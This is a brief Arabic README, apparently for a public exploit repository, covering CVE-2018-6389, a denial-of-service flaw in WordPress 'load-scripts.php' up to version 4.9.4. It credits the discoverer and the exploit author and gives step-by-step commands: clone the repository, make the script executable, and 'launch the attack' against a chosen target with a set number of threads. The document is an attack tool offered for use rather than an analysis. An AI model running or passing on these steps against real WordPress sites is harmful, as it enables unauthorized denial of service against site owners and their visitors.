
CVE-2018-6389 WordPress Core - 'load-scripts.php' رفض الخدمة <= 4.9.4
التاريخ: 05/02/2018
رابط البرنامج: WordPress
الإصدار: <= 4.9.4
تم الاختبار على: KaLi Linux 2018.1
CVE: CVE-2018-6389
اكتشفه: Barak Tawily
الاستغلال بفضل: Javier Olmedo
انسخ هذا المستودع
git clone https://github.com/JJavierOlmedo/wordpress-cve-2018-6389.git
انتقل إلى المستودع المحلي
cd wordpress-cve-2018-6389
غيّر صلاحيات الوصول
sudo chmod +x wordpress-cve-2018-6389.py
إطلاق الهجوم!!
python3 wordpress-cve-2018-6389.py -u <TARGET> -t <THREADS>
cve-2018-6389